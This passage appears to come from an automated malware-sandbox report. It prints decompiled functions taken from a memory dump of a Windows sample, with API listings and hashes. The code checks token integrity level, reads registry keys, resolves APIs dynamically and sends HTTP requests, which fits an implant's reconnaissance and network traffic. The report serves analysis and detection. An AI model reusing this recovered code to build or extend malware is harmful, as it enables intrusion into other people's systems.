    				void* _v76;
    				void* __esi;
    				intOrPtr* _t32;
    				void* _t36;
    				signed char* _t41;
    				int _t46;
    				intOrPtr* _t51;
    				intOrPtr* _t57;
    				signed char* _t60;
    				signed char* _t64;
    				DWORD* _t90;
    				signed char* _t91;
    				void* _t92;
    				void* _t93;
    				char _t94;
    
    				_t96 =  &_v36;
    				_t92 = __eax;
    				_v12 = 0;
    				_t32 = E0040E4B4(0xb0, __eax);
    				 *_t32(_t92, 8,  &_v12);
    				_v32 = _v24;
    				_v28 = 1;
    				_t36 = E004019A0( &_v32);
    				_t98 = _t36;
    				if(_t36 != 0) {
    					_v36 = 0;
    					E0040E4B4(0xae, _t92);
    					_t90 =  &_v36;
    					GetTokenInformation(_v32, 0x19, 0, 0, _t90); // executed
    					_t41 = _v40;
    					__eflags = _t41;
    					if(_t41 != 0) {
    						E00407450( &_v56, _t41);
    						_t93 = E00409700( &_v60, 0);
    						E0040E4B4(0xae, _t93);
    						_t46 = GetTokenInformation(_v44, 0x19, _t93, _v48, _t90); // executed
    						__eflags = _t46;
    						if(_t46 == 0) {
    							E0040AE90( &_v60, _t93);
    							__eflags = _v36;
    							if(__eflags != 0) {
    								E00408190( &_v40, _t93, __eflags);
    							}
    							__eflags = 0;
    							return 0;
    						} else {
    							_t51 = E0040E4B4(0xad, _t93);
    							_t91 =  *_t51( *_t93);
    							__eflags = _t91;
    							if(_t91 == 0) {
    								E0040AE90( &_v64, _t93);
    								__eflags = _v40;
    								if(__eflags != 0) {
    									E00408190( &_v44, _t93, __eflags);
    								}
    								__eflags = 0;
    								return 0;
    							} else {
    								_t57 = E0040E4B4(0xac, _t93);
    								_t60 =  *_t57( *_t93, ( *_t91 & 0x000000ff) - 1);
    								__eflags = _t60;
    								if(_t60 == 0) {
    									E0040AE90( &_v36 + 4, _t93);
    									__eflags = _v48;
    									if(__eflags != 0) {
    										E00408190( &_v52, _t93, __eflags);
    									}
    									__eflags = 0;
    									return 0;
    								} else {
    									_t64 =  *_t60;
    									__eflags = _t64;
    									if(_t64 == 0) {
    										_t94 = 1;
    									} else {
    										__eflags = _t64 - 0x1000;
    										if(_t64 == 0x1000) {
    											_t94 = 2;
    										} else {
    											__eflags = _t64 - 0x2100;
    											if(_t64 == 0x2100) {
    												_t94 = 4;
    											} else {
    												__eflags = _t64 - 0x2000;
    												if(_t64 == 0x2000) {
    													_t94 = 3;
    												} else {
    													__eflags = _t64 - 0x3000;
    													if(_t64 == 0x3000) {
    														_t94 = 5;
    													} else {
    														__eflags = _t64 - 0x4000;
    														if(_t64 != 0x4000) {
    															__eflags = _t64 - 0x5000;
    															_t94 =  ==  ? 7 : 0;
    														} else {
    															_t94 = 6;
    														}
    													}
    												}
    											}
    										}
    									}
    									E0040AE90(_t96 + 4, _t94);
    									__eflags = _v48;
    									if(__eflags != 0) {
    										E00408190( &_v52, _t94, __eflags);
    									}
    									return _t94;
    								}
    							}
    						}
    					} else {
    						__eflags = _v32;
    						if(__eflags != 0) {
    							E00408190( &_v36, _t92, __eflags);
    						}
    						__eflags = 0;
    						return 0;
    					}
    				} else {
    					E00408190( &_v32, _t92, _t98);
    					return 0;
    				}
    			}

    APIs
    • GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00402607
      • Part of subcall function 00408190: FindCloseChangeNotification.KERNELBASE(?,?,00000001,0040E9D8,?,004017A2,00000000), ref: 004081A7
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: ChangeCloseFindInformationNotificationToken
    • String ID:
    • API String ID: 584730905-0
    • Opcode ID: 53067ee044eb30cc9ff3bb2ca93df4ff11c0bb7ca127216c86efb6b0fee6d338
    • Instruction ID: d26a74dbf4f2edbbd94c76840a93b4a4774ba27ce600a5b05c874b9f3b8c6451
    • Opcode Fuzzy Hash: 53067ee044eb30cc9ff3bb2ca93df4ff11c0bb7ca127216c86efb6b0fee6d338
    • Instruction Fuzzy Hash: FC41A1316082015AE725EA2AD94979F76D09F84354F04083FF485B62E2EABDCDCAC7D7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00402400(void* __ecx, void* __eflags, char* _a4, intOrPtr _a8) {
    				int _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				void* __esi;
    				void* _t37;
    				char* _t39;
    
    				_t37 = __ecx;
    				if(E0040EAC0(__ecx) == 0) {
    					_v24 = 0;
    					_v20 = 0;
    					E0040E4B4(0xba, 0);
    					_t39 = _a4;
    					RegQueryValueExA( *(_t37 + 4), _t39, 0,  &_v24, 0,  &_v20); // executed
    					_t19 = _v20;
    					if(_v20 != 0) {
    						E00409F60(_a8, _t19);
    						E0040E4B4(0xba, 0);
    						RegQueryValueExA( *(_t37 + 4), _t39, 0,  &_v32, E00409700(_a4, 0),  &_v28); // executed
    						return _v32;
    					} else {
    						return 0;
    					}
    				} else {
    					return 0;
    				}
    			}

    APIs
    • RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,00416C54,?,00404AD2,?,?,?,00000000), ref: 00402448
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: QueryValue
    • String ID:
    • API String ID: 3660427363-0
    • Opcode ID: 291010aad21f5ac955520d6fdc022d4e105324ce443974fd4deb0117218c9240
    • Instruction ID: 9628f10cd02a6c1163a9310fcfb111c5ddf1efa4072111960f2d567f3ed6c4ff
    • Opcode Fuzzy Hash: 291010aad21f5ac955520d6fdc022d4e105324ce443974fd4deb0117218c9240
    • Instruction Fuzzy Hash: 2A1186323052157BD200A62ADC40CABBBECEFC5368F00893BF448D3251D636DD56C7A6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00401FC4(long __eax, void* __esi) {
    				void* _t5;
    				void* _t8;
    				long _t11;
    
    				_t12 = __esi;
    				_push(__esi);
    				_t11 = __eax;
    				if( *0x416c00 == 0x21436587) {
    					E0040E4B4(0x55, __esi);
    					_t5 = HeapCreate(0, 0xa00000, 0); // executed
    					 *0x416c00 = _t5;
    				}
    				E0040E4B4(0x57, _t12);
    				_t8 = RtlAllocateHeap( *0x416c00, 8, _t11); // executed
    				return _t8;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,?,?,0040E0C9,?,0040279B,00000000), ref: 00401FF7
    • HeapCreate.KERNELBASE(00000000,00A00000,00000000,?,?,0040E0C9,?,0040279B,00000000), ref: 00402011
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: Heap$AllocateCreate
    • String ID:
    • API String ID: 2875408731-0
    • Opcode ID: ee653ab09710ee93a42bb3df0432f851494da9db4100b67c98dbd467ff66a5cc
    • Instruction ID: 889790a7cb6b1296d7e3fa3bfffeb985743830b49e44318b493bb21dc6a05e30
    • Opcode Fuzzy Hash: ee653ab09710ee93a42bb3df0432f851494da9db4100b67c98dbd467ff66a5cc
    • Instruction Fuzzy Hash: 44E08C303085416AE710A77ABC05F6B2199EBC4301F22883BB005E22F1FF788801A6AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E004097F0(char __ecx, intOrPtr _a4) {
    				char _v0;
    				intOrPtr _v24;
    				char _v28;
    				long _v36;
    				void* _v40;
    				void* _v44;
    				long _v64;
    				long _v68;
    				void* _v72;
    				long _v76;
    				long _v80;
    				unsigned int _v84;
    				long _v88;
    				intOrPtr _v92;
    				char _v104;
    				void* _v108;
    				long _v112;
    				unsigned int _v116;
    				intOrPtr _v120;
    				signed short* _v124;
    				long _v128;
    				unsigned int _v132;
    				void* _v136;
    				long _v140;
    				long _v144;
    				char _v148;
    				intOrPtr _v152;
    				long _v156;
    				long _v160;
    				long _v164;
    				long _v168;
    				long _v172;
    				long _v176;
    				char _v180;
    				long _v184;
    				long _v188;
    				long _v192;
    				long _v196;
    				long _v200;
    				long _v204;
    				long _v208;
    				long _v212;
    				long _v216;
    				long _v220;
    				char _v228;
    				void* _v232;
    				void* _v236;
    				void* _v240;
    				void* _v244;
    				void* _v248;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				intOrPtr _t189;
    				intOrPtr _t192;
    				signed short* _t200;
    				unsigned int _t201;
    				long _t203;
    				int _t205;
    				intOrPtr* _t216;
    				int _t217;
    				intOrPtr* _t227;
    				int _t228;
    				intOrPtr* _t244;
    				void* _t250;
    				int _t252;
    				long _t253;
    				void* _t275;
    				char* _t284;
    				void* _t309;
    				long _t311;
    				unsigned int* _t312;
    				void* _t313;
    				char* _t314;
    				long _t315;
    				int _t317;
    				signed int _t319;
    				void* _t320;
    				signed int _t322;
    				void* _t328;
    				intOrPtr _t342;
    				long _t361;
    				intOrPtr* _t363;
    				long _t369;
    				intOrPtr* _t373;
    				long _t374;
    				intOrPtr* _t376;
    				long _t377;
    				intOrPtr _t378;
    				char _t380;
    				long _t381;
    				long _t383;
    				long _t384;
    				long _t386;
    				unsigned int* _t388;
    				unsigned int* _t389;
    
    				_t388 =  &_v132;
    				_t380 = __ecx;
    				_t189 =  *((intOrPtr*)(__ecx + 4));
    				if(_t189 == 0 || _t189 == 0xffffffff) {
    					L58:
    					E00407450(_a4, 0);
    					return _v0;
    				} else {
    					_t192 =  *((intOrPtr*)(__ecx + 8));
    					if(_t192 == 0 || _t192 == 0xffffffff) {
    						goto L58;
    					} else {
    						_t376 = __ecx + 0x1c;
    						if( *((intOrPtr*)(_t376 + 4)) == 0) {
    							_t384 = 0;
    							_v68 = 0;
    							_v64 = 0;
    							E0040E280( &_v68, __ecx, 0);
    						} else {
    							_t384 = 0;
    							_v28 = 0;
    							_v24 = 0;
    							E0040EA50( &_v28,  *_v0, 0);
    							if( *((intOrPtr*)(_t376 + 4)) > 1) {
    								_t322 = 1;
    								do {
    									E0040B7A0( &_v28, 0x414bf0);
    									E0040B7A0( &(_t388[0x1f]),  *((intOrPtr*)( *((intOrPtr*)( *_t376 + _t322 * 4)))));
    									_t322 = _t322 + 1;
    								} while (_t322 <  *((intOrPtr*)(_t376 + 4)));
    							}
    							_v68 = _t384;
    							_v64 = _t384;
    							E0040EA50( &_v68, _v28, _t384);
    							E0040BAB4(_v36);
    							_v36 = _t384;
    							_t388[0x1f] = _t384;
    						}
    						E0040DEA0(_t309, _t376, _t376);
    						E0040A358( &(_t388[0x16]));
    						_t361 = E0040E4B4(0x140, _t380);
    						if(_t361 != 0) {
    							_v136 =  *((intOrPtr*)(_t380 + 8));
    							_t200 = _t388[0x16];
    							_v124 = _t200;
    							_v128 =  *((intOrPtr*)(_t376 + 4));
    							if(_t200 == 0) {
    								_t311 = _t384;
    							} else {
    								_t311 = _t384;
    								while(( *_t200 & 0x0000ffff) != 0) {
    									_t200 =  &(_t200[1]);
    									_t311 = _t311 + 1;
    								}
    							}
    							_t327 = _t388[0x27];
    							_t201 =  *((intOrPtr*)(_t388[0x27] + 8));
    							_v132 = _t201;
    							if(_t201 != 0) {
    								_v140 = _t361;
    								_t328 = E00409700(_t327, 0);
    							} else {
    								_t328 = _t384;
    							}
    							_t203 = _v128;
    							_t204 =  !=  ? _v124 : _t203;
    							_t205 = HttpSendRequestW(_v136,  !=  ? _v124 : _t203, _t311, _t328, _v132); // executed
    							if(_t205 == 0) {
    								E0040EAB0();
    								if(_t205 != 0) {
    									goto L56;
    								} else {
    									goto L18;
    								}
    							} else {
    								L18:
    								_t388[0x1b] = 4;
    								_t363 = E0040E4B4(0x146, _t380);
    								if(_t363 == 0) {
    									_t205 = 0x7f;
    									goto L56;
    								} else {
    									_t312 =  &(_t388[0x1b]);
    									_t205 =  *_t363( *((intOrPtr*)(_t380 + 8)), 0x20000013,  &_v64, _t312, 0);
    									if(_t205 == 0) {
    										E0040EAB0();
    										if(_t205 != 0) {
    											goto L56;
    										} else {
    											goto L20;
    										}
    									} else {
    										L20:
    										_v116 = _t384;
    										_v112 = _t384;
    										 *((intOrPtr*)(_t380 + 0x30)) = _v84;
    										E0040E060( &_v116, _t380, 0x2800);
    										_v84 = _v116 >> 1;
    										_t216 = E0040E4B4(0x146, _t380);
    										if(_t216 == 0) {
    											_t217 = 0x7f;
    											goto L54;
    										} else {
    											_t217 =  *_t216( *((intOrPtr*)(_t380 + 8)), 0x14, _v116, _t312, 0);
    											if(_t217 == 0) {
    												E0040EAB0();
    												if(_t217 != 0) {
    													L54:
    													 *(_t380 + 0x3c) = _t217;
    													E0040BAB4(_v116);
    													_v116 = _t384;
    													_v112 = _t384;
    													E0040BAB4(_t388[0x16]);
    													goto L57;
    												} else {
    													goto L22;
    												}
    											} else {
    												L22:
    												E00406488( &_v144);
    												_t224 = _v144;
    												if(_v144 !=  *((intOrPtr*)(_t380 + 0x34))) {
    													E0040EA50(_t380 + 0x34, _t224, 0);
    													_t224 = _v152;
    												}
    												E0040BAB4(_t224);
    												_v144 = _t384;
    												_v140 = _t384;
    												_t388[0x1b] = _v132 >> 1;
    												_t227 = E0040E4B4(0x146, _t380);
    												if(_t227 == 0) {
    													_t228 = 0x7f;
    													goto L52;
    												} else {
    													_t228 =  *_t227( *((intOrPtr*)(_t380 + 8)), 0x16, _v136, _t312, 0);
    													if(_t228 == 0) {
    														E0040EAB0();
    														if(_t228 != 0) {
    															L52:
    															 *(_t380 + 0x3c) = _t228;
    															E0040BAB4(_v136);
    															_v136 = _t384;
    															_v132 = _t384;
    															E0040BAB4(_v120);
    															goto L57;
    														} else {
    															goto L26;
    														}
    													} else {
    														L26:
    														_t369 = _v156;
    														E00406488( &_v164);
    														_t235 = _v164;
    														if(_v164 != _v148) {
    															E0040EA50( &_v148, _t235, 0);
    															_t235 = _v172;
    														}
    														E0040BAB4(_t235);
    														_v164 = _t384;
    														_v160 = _t384;
    														_t313 = E00408DB0(_t380, _v148, 0x414bf0);
    														_t389 =  &(_t388[2]);
    														if(_t313 == 0) {
    															_t314 =  &_v220;
    															E0040E710(_t314, _t369,  &_v148);
    														} else {
    															_v200 = _t384;
    															_v196 = _t384;
    															_v192 = _t384;
    															_v188 = _t384;
    															_v184 = _t384;
    															E0040E280( &_v188, _t380, _t384);
    															_t342 = _v152;
    															_t284 = 0x414bf0;
    															_t374 = _t384;
    															do {
    																_t284 = _t284 + 1;
    																_t374 = _t374 + 1;
    															} while ( *_t284 != 0);
    															_v220 = _t376;
    															_t378 = _t342;
    															_v180 = _t380;
    															_t383 = _t384;
    															_t386 = _t374;
    															do {
    																_v132 = _t383;
    																_t320 = _t313 - _t378;
    																_v128 = _t383;
    																if(_t320 == 0) {
    																	E0040E280( &_v132, _t383, 0);
    																} else {
    																	E0040EA50( &_v132, _t378, _t320);
    																}
    																E0040E200( &_v200, _v132);
    																E0040BAB4(_v136);
    																_v136 = _t383;
    																_t378 = _t378 + _t320 + _t386;
    																_v132 = _t383;
    																_t313 = E00408DB0(_t383, _t378, 0x414bf0);
    																_t389 =  &(_t389[2]);
    															} while (_t313 != 0);
    															_t384 = _t383;
    															_t376 = _v220;
    															_t380 = _v180;
    															E0040E200( &_v200, _t378);
    															_t389[2] = _t384;
    															_v220 = _t384;
    															_v216 = _t384;
    															_v212 = _t384;
    															_v208 = _t384;
    															E0040E280( &_v212, _t380, _t384);
    															_t314 =  &_v228;
    															if( &_v208 != _t314) {
    																_push( &_v200);
    																E00409F80(_t314, _t314);
    															}
    															E0040DEA0(_t314,  &_v200, _t376);
    															E0040BAB4(_v188);
    															_v188 = _t384;
    															_v184 = _t384;
    														}
    														if(_t314 != _t376) {
    															_push(_t314);
    															E00409F80(_t314, _t376);
    														}
    														E0040DEA0(_t314, _t314, _t376);
    														E0040BAB4(_v208);
    														_v208 = _t384;
    														_v204 = _t384;
    														if( *((intOrPtr*)(_t376 + 4)) > 0) {
    															_t244 =  *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x1c))));
    														} else {
    															_t244 = _t380 + 0x28;
    														}
    														 *((char*)( *_t244)) = 0;
    														if( *((intOrPtr*)(_t376 + 4)) > 1) {
    															_v176 = _t380 + 0x28;
    															_t319 = 1;
    															_v180 = _t380;
    															_t381 =  *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x1c)) + 4));
    															while(1) {
    																E00409F28( &_v116, 0xf);
    																_t275 = E00409EB0(_t381,  *_t381, _v116);
    																_t389 =  &(_t389[2]);
    																E0040BAB4(_v116);
    																_v116 = _t384;
    																_v112 = _t384;
    																if(_t275 != 0) {
    																	break;
    																}
    																_t319 = _t319 + 1;
    																if(_t319 >=  *((intOrPtr*)(_t376 + 4))) {
    																	_t380 = _v180;
    																} else {
    																	if(_t319 < 0) {
    																		_t381 = _v176;
    																	} else {
    																		_t381 =  *((intOrPtr*)( *_t376 + _t319 * 4));
    																	}
    																	continue;
    																}
    																goto L60;
    															}
    															_t373 = _v176;
    															_t380 = _v180;
    															if(_t319 >= 0 && _t319 <  *((intOrPtr*)(_t376 + 4))) {
    																_t373 =  *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x1c)) + _t319 * 4));
    															}
    															 *((char*)( *_t373)) = 0;
    														}
    														L60:
    														E00405240(_t376);
    														E00407450( &_v180, 0x1000);
    														_t315 = _v176;
    														_t377 = _t384;
    														while(1) {
    															_t389[0x20] = 0;
    															if(E0040E4B4(0x148, _t380) == 0) {
    																break;
    															}
    															_t250 = E00409700( &_v180, _t377);
    															_t252 = _v0( *((intOrPtr*)(_t380 + 8)), _t250, _t315 - _t377,  &_v104);
    															if(_t252 == 0) {
    																E0040EAB0();
    																_t317 = _t252;
    																if(_t317 == 0) {
    																	goto L68;
    																} else {
    																	goto L72;
    																}
    															} else {
    																_t317 = 0;
    																L68:
    																_t253 = _v116;
    																if(_t253 == 0) {
    																	L72:
    																	_t384 = 0;
    																} else {
    																	_t377 = _t377 + _t253;
    																	_t315 = _v188;
    																	if(_t377 == _t315) {
    																		E00409F60( &_v196, _t315 + 0x1000);
    																		_t315 = _v192;
    																	}
    																	continue;
    																}
    															}
    															L63:
    															E00409F60( &_v196, _t377);
    															if(_t317 != 0) {
    																 *(_t380 + 0x3c) = _t317;
    																E0040AE90( &_v196, _t380);
    																E0040BAB4(_v172);
    																_v172 = _t384;
    																_v168 = _t384;
    																E0040BAB4(_v156);
    																goto L57;
    															} else {
    																E00409710(_v92,  &_v196);
    																E0040AE90( &_v200, _t380);
    																E0040BAB4(_v176);
    																_v176 = _t384;
    																_v172 = _t384;
    																E0040BAB4(_v160);
    																_v160 = _t384;
    																_v156 = _t384;
    																E0040BAB4(_v168);
    																_v168 = _t384;
    																_v164 = _t384;
    																return _t389[0x26];
    															}
    															goto L88;
    														}
    														_t384 = 0;
    														_t317 = 0x7f;
    														goto L63;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						} else {
    							_t205 = 0x7f;
    							L56:
    							 *(_t380 + 0x3c) = _t205;
    							E0040BAB4(_v80);
    							L57:
    							_v80 = _t384;
    							_v76 = _t384;
    							E0040BAB4(_v88);
    							_v88 = _t384;
    							_v84 = _t384;
    							goto L58;
    						}
    					}
    				}
    				L88:
    			}

    APIs
    • HttpSendRequestW.WININET(?,?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00409946
      • Part of subcall function 0040BAB4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040BAFC
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: FreeHeapHttpRequestSend
    • String ID:
    • API String ID: 457321143-0
    • Opcode ID: 54bd5b62cb0fa66b0c1f64e23de0f26b2c3dfe4c691bf94ef13f772df4d90e6f
    • Instruction ID: be19dea9e682f1ccab86711ee6c89ef1ef1736676b1039119e2f9640732d1147
    • Opcode Fuzzy Hash: 54bd5b62cb0fa66b0c1f64e23de0f26b2c3dfe4c691bf94ef13f772df4d90e6f
    • Instruction Fuzzy Hash: 40122A706083459BD710EF56C881A1BBBE4BF84744F50483EF595A73A2DB79EC05CB8A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040A980(char* __ecx) {
    				void* _t26;
    				intOrPtr* _t35;
    				intOrPtr* _t36;
    				intOrPtr* _t37;
    				void* _t40;
    				char* _t42;
    				void* _t43;
    				intOrPtr* _t44;
    				void* _t45;
    
    				_t42 = __ecx;
    				 *__ecx = 0;
    				_t35 = __ecx + 0x14;
    				 *((intOrPtr*)(__ecx + 4)) = 0;
    				 *((intOrPtr*)(__ecx + 8)) = 0;
    				 *(__ecx + 0xc) = 1;
    				 *(__ecx + 0x10) = 1;
    				 *_t35 = 0;
    				 *((intOrPtr*)(_t35 + 4)) = 0;
    				E0040E280(_t35, _t43, 0);
    				_t44 = __ecx + 0x1c;
    				 *_t44 = 0;
    				_t36 = __ecx + 0x28;
    				 *((intOrPtr*)(_t44 + 4)) = 0;
    				 *((intOrPtr*)(_t44 + 8)) = 0;
    				 *_t36 = 0;
    				 *((intOrPtr*)(_t36 + 4)) = 0;
    				E0040E280(_t36, _t43, 0);
    				 *((intOrPtr*)(__ecx + 0x30)) = 0;
    				_t37 = __ecx + 0x34;
    				 *_t37 = 0;
    				 *((intOrPtr*)(_t37 + 4)) = 0;
    				E0040E280(_t37, _t43, 0);
    				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
    				_t40 =  *0x416c24; // 0xffffffff
    				if(_t40 == 0xffffffff) {
    					 *__ecx = 1;
    					E0040E4B4(0x137, _t43);
    					_t26 = InternetOpenA(0, 1, 0, 0, 0); // executed
    					 *0x416c24 = _t26;
    				}
    				E00409F28(_t45 + 8, 1);
    				E0040E200(_t44,  *((intOrPtr*)(_t45 + 8)));
    				E0040BAB4( *((intOrPtr*)(_t45 + 8)));
    				 *((intOrPtr*)(_t45 + 8)) = 0;
    				 *((intOrPtr*)(_t45 + 0xc)) = 0;
    				return _t42;
    			}

    APIs
    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00416C54,0040398A), ref: 0040AA2E
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: InternetOpen
    • String ID:
    • API String ID: 2038078732-0
    • Opcode ID: 539177dab3010bfbb9b1082670804c19358ae62e6dfd6a0c40bae9dab49acd59
    • Instruction ID: 9e2852b50f61cca8bbc008d3e1c10688a4e7899385864257a691f3fbd37f335c
    • Opcode Fuzzy Hash: 539177dab3010bfbb9b1082670804c19358ae62e6dfd6a0c40bae9dab49acd59
    • Instruction Fuzzy Hash: 3A214DB0501605AFD300DF2AC9C0996FBA8FF48348F50C97EE41997692D739D866CB95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040E914(signed int __eax, void* __esi) {
    				short _v260;
    				intOrPtr _t10;
    				struct HINSTANCE__* _t14;
    				intOrPtr _t18;
    				intOrPtr _t22;
    				signed int _t25;
    
    				_t24 = __esi;
    				_t25 = __eax;
    				_t10 =  *0x416bf8; // 0x1b8cc48
    				if(_t10 == 0x21436587) {
    					if(( *0x416c70 & 0x000000ff) != 0 || __eax == 1) {
    						goto L3;
    					} else {
    						 *0x416c70 = 1;
    						_t10 = E00401FC4(0x48, __esi);
    						 *0x416bf8 = _t10;
    						 *0x416c70 = 0;
    						if(_t10 != 0x21436587) {
    							goto L1;
    						} else {
    							goto L3;
    						}
    					}
    				} else {
    					L1:
    					_t18 =  *((intOrPtr*)(_t10 + _t25 * 4));
    					if(_t18 == 0) {
    						L3:
    						"RPh LA"();
    						if((_v260 & 0x0000ffff) == 0) {
    							return 0;
    						} else {
    							if(_t25 == 1) {
    								_t14 = E0040E874( &_v260);
    							} else {
    								E0040E4B4(1, _t24);
    								_t14 = LoadLibraryW( &_v260);
    							}
    							_t22 =  *0x416bf8; // 0x1b8cc48
    							if(_t22 != 0x21436587) {
    								 *(_t22 + _t25 * 4) = _t14;
    								return _t14;
    							}
    							return _t14;
    						}
    					} else {
    						return _t18;
    					}
    				}
    			}

    APIs
    • LoadLibraryW.KERNELBASE(?), ref: 0040E960
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: LibraryLoad
    • String ID:
    • API String ID: 1029625771-0
    • Opcode ID: 101dd6d137f5e053f4cced53c07c50b0c2e00fceb548b211b312e1c4600f35db
    • Instruction ID: 5a26911551e1c904521e716c20eafd88a48ebb4247ce45ed86db60b4d31a88b8
    • Opcode Fuzzy Hash: 101dd6d137f5e053f4cced53c07c50b0c2e00fceb548b211b312e1c4600f35db
    • Instruction Fuzzy Hash: 9211E9F060811549D7609B7AE8407AE36A16781300F458C3BE0DC967F5EA7DD8D5838A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00408E20(void* __ecx, void* _a4) {
    				char _v284;
    				void* __esi;
    				long _t13;
    				int _t16;
    				char* _t23;
    				intOrPtr* _t24;
    
    				_t24 = _a4;
    				 *_t24 = 0;
    				_t18 = _t24 + 0xc;
    				 *((intOrPtr*)(_t24 + 4)) = 0;
    				 *((intOrPtr*)(_t24 + 8)) = 0;
    				 *((intOrPtr*)(_t24 + 0xc)) = 0;
    				 *((intOrPtr*)(_t24 + 0x10)) = 0;
    				E0040E280(_t18, _t24, 0);
    				_t16 = 0;
    				_t23 =  &_v284;
    				while(1) {
    					E0040E4B4(0xb7, _t24);
    					_t13 = RegEnumKeyA(_a4, _t16, _t23, 0x105); // executed
    					if(_t13 != 0) {
    						break;
    					}
    					E0040E200(_t24, _t23);
    					_t16 = _t16 + 1;
    				}
    				return _t24;
    			}

    APIs
    • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000105,00000000), ref: 00408E6C
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: Enum
    • String ID:
    • API String ID: 2928410991-0
    • Opcode ID: 03df851c402e6869bd247068dc06d23986a1c943e8253d000cb6c9603630f485
    • Instruction ID: 4335694f89f6f61fd3cf12c44b328c68a8138f43bd1995dd4b1f9e44879fd326
    • Opcode Fuzzy Hash: 03df851c402e6869bd247068dc06d23986a1c943e8253d000cb6c9603630f485
    • Instruction Fuzzy Hash: 59F0AF71200B005AD324DB1BCD45DA7FBE8DFD9714F00C93FA4AD93291FA789C018A91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040BAB4(void* __eax) {
    				void* __esi;
    				void* _t1;
    				intOrPtr* _t4;
    				char _t10;
    				void* _t13;
    
    				_t1 = __eax;
    				_t13 = __eax;
    				if(__eax != 0) {
    					_t1 = E0040BB14(__eax);
    					if(_t1 != 0) {
    						_t4 = E0040E4B4(0x5b, _t13);
    						E0040824D(_t13,  *_t4( *0x416c00, 0, _t13), 0);
    						E0040E4B4(0x58, _t13);
    						_t10 = RtlFreeHeap( *0x416c00, 0, _t13); // executed
    						return _t10;
    					}
    				}
    				return _t1;
    			}

    APIs
    • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040BAFC
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: 2f7c41fb31f326e811238969c26e9915bdedfe27e38341fbf3a124e658f2aea6
    • Instruction ID: b3dc2f778f1cbce0ae180e115253812e7b461ebf98ff3ddc9b099ea088de2459
    • Opcode Fuzzy Hash: 2f7c41fb31f326e811238969c26e9915bdedfe27e38341fbf3a124e658f2aea6
    • Instruction Fuzzy Hash: FEE04F3070192113DA2132BEAC0279B25419F81714F068039B858BA3EAEE6C8C1596DD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00408190(void** __ecx, void* __esi, void* __eflags) {
    				int _t1;
    				void* _t2;
    				void** _t6;
    
    				_push(__esi);
    				_t6 = __ecx;
    				_t1 = E004019A0(__ecx);
    				if(_t1 != 0) {
    					_t2 = 6;
    					E0040E4B4(_t2, __esi);
    					_t1 = FindCloseChangeNotification( *_t6); // executed
    					 *_t6 = 0;
    				}
    				return _t1;
    			}

    APIs
    • FindCloseChangeNotification.KERNELBASE(?,?,00000001,0040E9D8,?,004017A2,00000000), ref: 004081A7
    Memory Dump Source
    • Source File: 00000001.00000001.333141207.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.333190460.0000000000418000.00000040.00020000.sdmp
    Similarity
    • API ID: ChangeCloseFindNotification
    • String ID:
    • API String ID: 2591292051-0
    • Opcode ID: 8001cc2682896ba0dd0af3e9441ed7c1f00f62342ffc3075d73103f905ab57f8
